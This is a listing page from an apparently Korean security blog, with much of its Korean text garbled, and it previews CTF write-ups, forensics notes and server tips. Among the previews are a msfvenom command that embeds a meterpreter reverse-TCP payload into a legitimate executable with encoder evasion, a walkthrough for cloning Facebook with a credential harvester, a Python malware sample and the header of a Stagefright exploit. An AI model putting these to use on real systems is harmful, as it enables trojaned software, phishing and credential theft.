728x90 ๋ฐ์ํ ์ ์ฒด ๊ธ275 Pharming malware ์์ฐ์ ๋๋ค. Pharming malware ํ๋ฐ ์ ์ฑ์ฝ๋ ๋์์์ ๋๋ค. ์ฃผ์ํ์ธ์ค :) Malware 2016. 12. 15. SQL injections vulnerabilities in Stack Overflow PHP questions SQL injections vulnerabilities in Stack Overflow PHP questions lastest SQL Injection vulnerabilities in PHP questions sql injection ์ทจ์ฝ์ ์ ์ทจ์ฝํ php๋ฌธ์ ๋ณผ์ ์๊ณ ๋ณด๊ธฐ ์ฌ์ด ์ธํฐํ์ด์ค๋ก ๋์ด์์ด์ :) https://laurent22.github.io/so-injections/ Security Study/Web 2016. 12. 14. python ์ ์ฑ์ฝ๋ ์ํ์ ๋๋ค. python ์ ์ฑ์ฝ๋ ์ํ์ ๋๋ค. ๋ถ์ ๋๋ ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. import subprocessimport sysimport osimport base64import binasciiimport threadingimport timeimport randomimport stringimport imaplibimport emailimport uuidimport platformimport ctypesimport json#import logging #from traceback import print_exc, format_excfrom base64 import b64decodefrom smtplib import SMTPfrom email.MIMEMultipart .. Malware 2016. 12. 14. seccon2016 - Memory Analysis_100 Memory Analysis100 pointsMemory Analysis Find the website that the fake svchost is accessing. You can get the flag if you access the website!!memoryanalysis.zip The challenge files are huge, please download it first. Hint1: http://www.volatilityfoundation.org/ Hint2: Check the hosts filepassword: fjliejflsjiejlsiejee33cnc ์ด๊ฒ์ด ๋ฌธ์ ์ธ๋ฐ ... ํ์ผ์ ๋ฐ์ผ๋ฉด ์ด๋ฏธ์ง ํ์ผ ํ๋๋ฅผ ๋ฐ์ ์ ์๋ค.ํํธ 1๋ฒ์ ๋ณด๋ฉด ๋ณผ๋ผํธ๋ฆฌํฐ๋ฅผ ์ด์ฉํ์ฌ ํธ๋ ๊ฒ๊ฐ๋ค. ๋จผ์ ์ด.. Wargame/CTF(Capture The Flag) 2016. 12. 13. rsa.py_ctf #๊ฐ๋ฃ์ผ๋ฉด ''์์ ๊ธฐ...p = ''g =''a = ''b = '' C = ''CA = pow(C,a,p)CAB = pow(CA,b,p) print("key_is",CAB) Language 2016. 12. 12. seccon2016 - voip_100 VoIP100 pointsVoIP Extract a voice. The flag format is SECCON{[A-Z0-9]}. ๋ฌธ์ ๋ฐ์ค๋ค... ํ์ผ์ ๋ฐ์ผ๋ฉด pcapํ์ผ์ ๋ฐ์ ์ ์๋ค. ํ์ผ์ ์ด์ด๋ณด๋ฉด ์์ด์ด ์คํฌ๋ก ์ด๋ฆฌ๋๋ฐ... RTP์ ๋์ฝ๋ ํ ๊ฒ์ด๋ค.๊ทธ๋ผ RTP๋ ๋ญ๊น?RTP๋ ์ค์๊ฐ ๋ฉํฐ๋ฏธ๋์ด ๋ฐ์ดํฐ์ ์ ์ก์ ์ง์ํ๋ Real Time Protocol๋ค. Analyze๋ผ๋ ๋ฉ๋ด์ ๋ค์ด๊ฐ๋ฉด Decode As๋ ๋ฉ๋ด๋ฅผ ์ฐพ์ผ ์์๋ค. ๋ฉ๋ด๋ฅผ ํด๋ฆญํ๋ฉด ์์ ๊ฐ์ ์ฐฝ์ด ๋จ๋๋ฐ +๋ผ๋ ํ์๋ฅผ ๋๋ฌ RTP๋ฅผ ๋ฑ๋ก ํด์ฃผ๋ฉด ๋๋ค. ๊ทธ ํ Telephony๋ฉ๋ด์์ RTP์์ Stream Analysis๋ฅผ ํด๋ฆญํ๊ฒ ๋๋ฉด ์ด๋ ๊ฒ streaming ๋๋ ๊ฒ์ ๋ณผ์์๋ค. ์ ๊ธฐ์ ํ๋ ์ด streams๋ฅผ ํด๋ฆญํ๋ฉด ์.. Wargame/CTF(Capture The Flag) 2016. 12. 12. SECCON2016 - Vigenere_100 SECCON 2016 Vigenerek: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe ๋ฌธ์ ์ด๋ค. Vigenere ์ํธ๋ฅผ ์ด์ฉํ์ฌ ํ์ด์ผ ํ ๊ฑฐ ๊ฐ๋ค. SECCON{ = VIGENER E p: SECCON{ }c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ |A B C D E F G H I J K L M N O P Q R S T U V W X Y Z { }--------------------------------.. Wargame/CTF(Capture The Flag) 2016. 12. 12. roo-me)Command & Control - level 2 -15Poin ํ์ผ์ ๋ค์ด ๋ฐ๊ฒ ๋๋ฉด ๋์ ch2.dmp๋ผ๋ ๋คํํ์ผ์ ์ป์ ์ ์๋ค.!!! ๋ฌธ์ ๋ฅผ ํด์ํด๋ณด์! ์ ๋ต์ ์ํฌ์คํ ์ด์ ํธ์คํธ๋ค์(์ฆ, ์ปดํจํฐ์ด๋ฆ)์ด ์ ๋ต์ด๋๋ค.! :) ๋ฃฐ๋ฃจ~ ๊ทธ๋ผ ํด๋ณด์ ํ์๋ strings ๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ํ์ด๋ณผ ๊ฒ์ด๋ค. strings ch2.dmp | grep COMPUTERNAME Wargame/CTF(Capture The Flag) 2016. 12. 12. Hack The Vote forensic 150 - Warpspeed ๋ฌธ์ ๋ฅผ ๋ค์ด๋ฐ์ ๋ณด๋ฉด ์ด๋ฌํ ์ฌ์ง์ ๋ฐ์ ์ ์๋ค. ๊ธ์จ๊ฐ ์ฐ๊ทธ๋ฌ์ ธ์ ๋ณด๊ธฐ ํ๋ค๋ค... ์ด๋ป๊ฒ ํ๊น ์๊ฐ์ ํ๋ฉด์ ๋ ธ๊ฐ๋ค๋ก ํ๋ํ๋ ์๋ผ์ ํ์ด๋ณผ๊น ์๊ฐ์ ํด๋ดค์ง๋ง 010editor ๋ผ๋ ํ๋ก๊ทธ๋จ์ ์ด์ฉํ์ฌ ํ์ด๋ณด๊ธฐ๋ก ํ๋ค. ์ด๋ ๊ฒ ํ์ผ์ ๋ณผ์๊ฐ ์๋ค. JPG.bt๋ฅผ ํ์ธํ์ฌ WORD Y, WORD X์ ๊ฐ์ 500, 500 ์ผ๋ก ๋ณ๊ฒฝํ ๊ฒ์ด๋ค. ๋ณ๊ฒฝํ์ฌ ์ ์ฅ์ ํ๊ฒ ๋๋ฉด ์ด๋ ๊ฒ ๊ธ์๋ฅผ ํ์ธ ํ ์ ์๋ค.!!! ๋์!!! Wargame/CTF(Capture The Flag) 2016. 11. 24. string filter(php) php://filter/string.rot13/resource=example.com http://php.net/manual/en/filters.string.php Security Study/Web 2016. 10. 5. CodeGate 2013 f300 Code Gate 2013 ๋ฌธ์ ๋ฅผ ๋จผ์ ๋ณด๋ฉด ํ์ผ์ ๋ค์ด ๋ฐ์๋ณด๋ฉด docxํ์ผ ํ๋๋ค ... ์๊ฐํด๋ณด์ ?..... ์ด๋ฌํ ๋ฌธ์ ๋ ooXML(office open XML)๋ฌธ์ ์ผ ๊ฐ๋ฅ์ฑ์ด ํฌ๋ค. ์คํผ์ค ์คํ XML(Office Open XML, OOXML, ์คํXML)์ ๋ง์ดํฌ๋ก์ํํธ๊ฐ ์ถ์งํ์์ผ๋ฉฐ 2006๋ ๊ณผ 2008๋ ๋์ฐจ๋ก์ ๊ฑธ์ณ Ecma ์ธํฐ๋ด์ ๋์ ์ ๋ฝ ํ์ค(ECMA-376)์ผ๋ก, 2008๋ ์ ISO/IEC์ ๊ตญ์ ํ์ค(ISO/IEC 29500)์ผ๋ก ์น์ธ๋์๋ค. ์ด ๋ฌธ์ ๊ท๊ฒฉ์ ๋ฌธ์, ํ๋ ์ ํ ์ด์ , ์คํ๋ ๋์ํธ๋ฅผ ํฌํจํ๋ค. ํ์ฅ์๋ .docx ๋๋ .docx(๋ฌธ์), .pptx(ํ๋ ์ ํ ์ด์ ), .xlsx(์คํ๋ ๋์ํธ)๋ก ํต์ผ๋์ด ์๋ค. -wiki- ๋จผ์ docxํ์ผ์ zip์ผ๋ก ํ์ฅ์ ๋ณ๊ฒฝ ํ ํ.. Wargame/CTF(Capture The Flag) 2016. 9. 23. ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) ๋ชจ๋ ์ฌ์ฉ์ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. msfvenom -a ์ํคํ ์ณ --platform ํ๋ซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํธ๋ค๋ฌ์์ ํ๋ก์ธ์ค ์ฎ๊ธฐ๋ ๋ช ๋ น์ด migrate ํ๋ก์ธ์ค ๋๋ฒ ex) migrate 1111 Metasploit 2016. 5. 24. apmsetup์์ forbidden๋ฌธ์ ํด๊ฒฐ apmํด๋๋ฅผ ๋ค์ด๊ฐ์ (ex)C:\APM_Setup\Server\Apache\conf) < -์ด๋ ๊ฒ ๋ค์ด๊ฐ์ httpd.confํ์ผ์ ๋ฉ๋ชจ์ฅ์ผ๋ก ์ด์ด ์๋์๊ฐ์ด ์์ ํด์ค๋ค. # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both compl.. Security Study/Server(Linux) 2016. 3. 2. ๊ฐ์ง facebook๋ง๋ค๊ธฐ ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ธ์. ๋จผ์ Kali linux or parrot linux์์ ํฐ๋ฏธ๋์ open setoolkit์ ์ ๋ ฅํ๋ค. ์ ๋ ฅ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ ํ์ธ ํ์ค์ ์์ต๋๋ค. ์ฌ๊ธฐ์ Social-Engineering Attacks๋ฅผ ํด์ผํ๊ธฐ ์ํด 1๋ฒ์ ์ ๋ ฅํฉ๋๋ค. ๋ค์์ Website Attack Vectors์ ์ํด 2๋ฒ ์ฌ๊ธฐ์์ Credential Harvester Attack Method๋ฅผ ์ํด 3๋ฒ facebook์ ๋ง๋ค๊ธฐ ์ํด 2๋ฒ์ ํด๋ฆญํฉ๋๋ค. ์ฌ๊ธฐ๊น์ง ํ์ จ์ผ๋ฉด ๋ฐ์์ต๋๋ค. 2๋ฒ์ ํ์ จ์ผ๋ฉด IP๋ฅผ ์ ๋ ฅํ์๋ฉด ๋๋๋ฐ์! ip๋ฅผ ์ ๋ ฅํ๋ฉด ์ด์ cloneํ๊ธฐ ์ํ ์ฌ์ดํธ๋ฅผ ์ ๋ ฅํ์๋ฉด ๋ฉ๋๋ค. ์ ๋ facebook.com์ ํ๊ธฐ์ํด http://faceboo.. Metasploit 2016. 2. 11. ๋ค์ ๋ธ๋ก๊ทธ ํ์ฑํํฉ๋๋ค. ๋๋ต 2๊ฐ์๋์ ๋ธ๋ก๊ทธ๋ฅผ ์ ๊ฒฝ์ฐ์ง ๋ชปํ ๊ฒ ๊ฐ์ต๋๋ค. ๋ค์ ๋ธ๋ก๊ทธ๋ฅผ ํ์ฑํํฉ๋๋ค. ๋ค๋ค ์ํด๋ณต ๋ง์ด ๋ฐ์ผ์๊ณ ์ํ์๋ ๋ฐ ๋ชจ๋ ์ด๋ฃจ์ด ์ง๊ธธ ๋ฐ๋๋๋ค. My Story 2016. 2. 10. stagefright.py ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10. ํ๋ฆฌ์ด๋ CTF ๋ ธ๋ต๊ทน์ฅ ์ด๊ธฐ๋ถ๋ถ ๋ค์๋ ์ค์ท์ฐ์๊ฒ ์์ด์ ์๋๊ณณ๊น์ง๋ง ... My Story 2016. 2. 10. Networkkkkk... ๋คํธ์ํฌ ?๋คํธ์ํฌ ๊ธฐ์ด ์ด๋ก ๋ฉ์์ง - ๋คํธ์ํฌ๋ก ์ ์กํ ์์ ๋จ์์ ๋ฐ์ดํฐ๋ฅผ ํจํท์ด๋ผ๊ณ ์ฌ์ฉํ์ง๋ง ์ด๊ฒ์ ํํํ๋ ์ข ๋ ๋ฒ์ฉ์ ์ธ ๋จ์ด๋ ๋ฉ์์ง- ํจํท์ ๋ค์ํ ์ํฉ์์ ํ ์ฅ๋น๊ฐ ๋ค๋ฅธ ์ฅ๋น๋ก ๋ณด๋ด๋ ๋ฉ์์ง๋ฅผ ์ธ๊ธํ๋ ๋ฐ ์ฐ์ด๋ ์ฌ๋ฌ ์ฉ์ด์ค ํ๋- ๊ฐ ์ฉ์ด OSI ์ฐธ์กฐ ๋ชจ๋ธ์ ํน์ ๊ณ์ธต์์ ๋์ํ๋ ํ๋กํ ์ฝ์ด๋ ๊ธฐ์ ๊ณผ ์ฐ๊ด๋์ด ์์ผ๋ฉฐ ๋ฉ์์ง๋ฅผ ์ง์นญํ ๋ ๊ฐ์ฅ ๋ง์ด ์ฐ์ด๋ ๋จ์ด๋ ๋ค์๊ณผ ๊ฐ๋ค.1) ํจํท โ OSI ์ฐธ์กฐ ๋ชจ๋ธ์ ๋ฝ,์ํฌ ๊ณ์ธต์์ ๋์ํ๋ ํ๋กํ ์ฝ์ด ๋ณด๋ด๋ ๋ฉ์์ง๋ฅผ ์๋ฏธ2) ๋ฐ์ดํฐ ๊ทธ๋จ โ ๊ธฐ๋ณธ์ ์ผ๋ก ํจํท๊ณผ ๋์์ด ๋คํธ์ํฌ ๊ณ์ธต ๋ฉ์์ง๋ฅผ ์๋ฏธ3) ํ๋ ์ -4) ์ 5) PDU ๋ฉ์์ง ํฌ๋งคํ (ํค๋, ํ์ด๋กฃ, ํธํฐ)- ๋ฉ์์ง๋ ๋คํธ์ํฌ๋ฅผ ํตํด ์ ๋ณด๋ฅผ ์ ์กํ๋ ๋ฐ ์ฐ์ด๋ ๊ตฌ์กฐ- ๋ฉ์์ง๋ ํ๋กํ ์ฝ์ด๋.. Security Study/Network 2016. 2. 10. ๋์คํฌ / ํ์ผ์์คํ - ๋์คํฌ ๋น๊ต์ ๋จ์ํ ๊ตฌ์กฐ๋ฅผ ๊ฐ์ง๊ณ ์๋ค. ๊ทธ๋ฌ๋ ๋ง์ฝ ์ธ๋ถ ์ ์ฒด์ ์๋ขฐ๋ฅผ ํ๋ค๋ฉด ์ ๋ณด ์ ์ถ์ด ๋๋ฏ๋ก ์ฃผ์ ํด์ผํ๋ ๋จ์ ์ด ์๋ค.๋์คํฌ๋ฅผ ๋ถ์ ํ ๋๋ ์ฆ๊ฑฐ ์ ์ฅ์ฉ ๋์คํฌ๋ฅผ Master๋ก ์ค์ ํ์ฌ ๋ถ์ ๋์ ๋์คํฌ๋ฅผ slave๋ก ์ง์ ํ์ฌ ๋ถํ ์ master๋ก ํ๋ค.์ด์ ๋ ์ฆ๊ฑฐ์ฉ ๋์คํฌ์ ์ํฅ์ ์ฃผ์ง ์๊ธฐ ์ํด์ ์ด๋ค. ๋์คํฌ ๋ถ์ - ๋ฐ๋์ ์๋ณธ์ ๋ณต์ ํ ๋ณต์ฌ๋ณธ์ ๊ฐ์ง๊ณ ๋ถ์์ ํ๋ค. - ์ฝ๊ธฐ ์ ์ฉ์ผ๋ก ์ค์ ํ ํ ๋ถ์ํ๋ค. - ๋ณต์ ๋์คํฌ๋ ์๋ณธ ๋์คํฌ๋ ์ฉ๋์ ๊ฐ๊ฒํ๋ค. (๊ฐ์๊ฒ ์๋ค๋ฉด ํฌ๊ฒ) ๋์คํฌ ๋ณต์ - H/W ์ ์ธ ๋ฐฉ๋ฒ : ์ฅ๋น๋ฅผ ์ด์ฉ, ์ฌ์ฉ์ด ๊ฐํธํ๊ณ ์๋๊ฐ ๋น ๋ฅด์ง๋ง ๊ฐ๊ฒฉ์ด ๋น์ธ๋ค. ๋ํ ๋ผ์ด๋ธ ์์คํ ์์ ์ํ์ด ๋ถ๊ฐ๋ฅํ๋ค. - S/W ์ ์ธ ๋ฐฉ๋ฒ : ๋ผ์ด๋ธ ํ ์์คํ ์์ ๊ทธ๋๋ก ๋์คํฌ ๋ณต์ฌ .. For3nsic/Forensic 2015. 12. 22. Forensic TimeLine ํ์๋ผ์ธ์ด ๋ฌด์์ผ๊น? ํ์๋ผ์ธ์ ์ฌ์ ์๋ฏธ๋ก๋ ์ฐ๋ํ, ์๊ฐํ ์ด๋ฌํ ์๋ฏธ๋ฅผ ๋ค๊ณ ์๋ค.๋๋ ๋น๋์ค ํด๋ฆฝ์ด๋ ์ค๋์ค ํด๋ฆฝ์ ์์๋๋ก ๋ฐฐ์นํ๋ ํธ์ง ํ๋ก๊ทธ๋จ ์์ ๊ณต๊ฐ. ํ์๋ผ์ธ์ ๋ ์ด์ด์ ํ๋ ์์ผ๋ก ๊ตฌ์ฑ๋์ด ์๋๋ฐ, ๋ ์ด์ด์ ๊ฒฐํฉ์ ํตํด ํ๋ฉด์ ์ด๋ฏธ์ง๋ ์ค๋์ค๋ฅผ ๋ฐฐ์นํจ์ผ๋ก์จ ์์ง์ด๋ ์ ๋๋ฉ์ด์ ์ด๋ ์์ ์ ๋ง๋๋ ๊ธฐ๋ฅ์ด๋ค.- ๋ค์ด๋ฒ ์ฉ์ด์ฌ์ - ๊ทธ๋ฌ๋ ์ฌ์ ์ ์๊ฐํ์ง ๋ง๊ณ ์๋๋ผ๋ ์ฃผ์์ ์์ ์ ํ๋ ์ฌ๋์ด๋ ๋น์ทํ ์ผ์ ํ๋ ์ฌ๋๋ค์ ๋ณด๋ฉด ํ์๋ผ์ธ์ด๋ผ๋ ๋จ์ด๋ฅผ ๋ง์ด ์ฌ์ฉํ๋ค.์ด์ฒ๋ผ ์ปดํจํฐ๋ฅผ ๋ถ์ํ ๋ ๋ํ ํ์๋ผ์ธ์ด ์ฌ์ฉ๋๋๋ฐ ์ด๋ ํ ๋์์ ํ๋์ง ์๊ฐ์ ๋จ๊ฒจ์ค๋ค. ์ฐจ์ด๊ฐ ์์ ์ ์์ง๋ง ์ด๋ฌํ ์๋ฏธ๋ฅผ ๊ฐ์ง๋ค. ์ด๋ฌํ ๊ธฐ๋ฅ์ ์ด๋์ ํ ์ ์์๊น?ํ์๋ผ์ธ ๊ธฐ๋ฅ์ ์ธ์ผ์ด์ค์ ์๋ ๊ธฐ๋ฅ์ด๋ผ๊ณ ์๋ค. ์ธ์ผ์ด์ค 7.x.. For3nsic/Forensic 2015. 12. 14. postgreSQL? postgreSQL??? service postgresql start Metasploit 2015. 12. 14. hosting ์ํ๊ธฐ์ํ ๊ธฐ๋ณธ? ์น์ฌ์ดํธ๋ฅผ ๋ง๋ค๋ฉด ํธ์คํ ์ด๋ ๊ฒ์ ์ด์ฉํ์ฌ ์๋ก ์ฐ๊ฒฐ ์ํจ๋ค. ๊ฑฐ๊ธฐ์ ๋ณด๋ฉด DNS nameserver ๋ฑ ์ด๋ฌํ ๋ง์ด ๋์ค๋๋ฐ ๊ณผ์ฐ ๋ฌด์์ผ๊น? ์ฝ๊ฒ๋ณด์!! DNS๋ ?Domain Name Server IP์ฃผ์๋ฅผ ์ธ๊ฐ์ด ๊ธฐ์ตํ๊ธฐ ํธํ ์ธ์ด์ฒด๊ณ๋ก ๋ณํํ๋ ํด์ฃผ๋๋ฐ ์ฌ์ฉ๋๋ค. Nameserver๋? ์๋ฌธ ๋๋ฉ์ธ์ ๋ค ์๋ฆฌ์ IP์ฃผ์๋ก ๋งคํ ์์ผ์ฃผ๋ ์๋ฒ๋ฅผ ๋งํ๋ค. Security Study/Web 2015. 12. 13. mac ํฐ๋ฏธ๋ vim ๊พธ๋ฏธ๊ธฐ vi ~/.vimrc 2 || has("gui_running") syntax on set hlsearchendif " Only do this part when compiled with support for autocommands.if has("autocmd") " Enable file type detection. " Use the default filetype settings, so that mail gets 'tw' set to 72, " 'cindent' is on in C files, etc. " Also load indent files, to automatically do language-dependent indenting. filetype plugin indent on " Put these in.. Security Study/Source 2015. 12. 10. kali linux 2.0 apt-get /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free Metasploit/Kali & Backtrack 2015. 12. 10. ubuntu ๋๋ ํ ๋ฆฌ ๋ฆฌ์คํ ๋ง๊ธฐ ์๋ฒ๋ฅผ ์ด์ํ๋ค๋ณด๋ฉด ๋๋ ํ ๋ฆฌ๋ฆฌ์คํ ๋๋ฌธ์ ๊ฑฑ์ ํ์๋ ์ฌ๋์ด ๋ง์ ๊ป๋๋ค. ์ฐ๋ถํฌ๋ฅผ ์ฌ์ฉํ์๋ ๋ถ๋ค์ ์ฃผ๋ชฉ!!! vi /etc/apache2/apache2.conf Security Study/Server(Linux) 2015. 12. 10. ์ด์ 1 ยทยทยท 3 4 5 6 7 8 9 ยทยทยท 11 ๋ค์ 728x90 ๋ฐ์ํ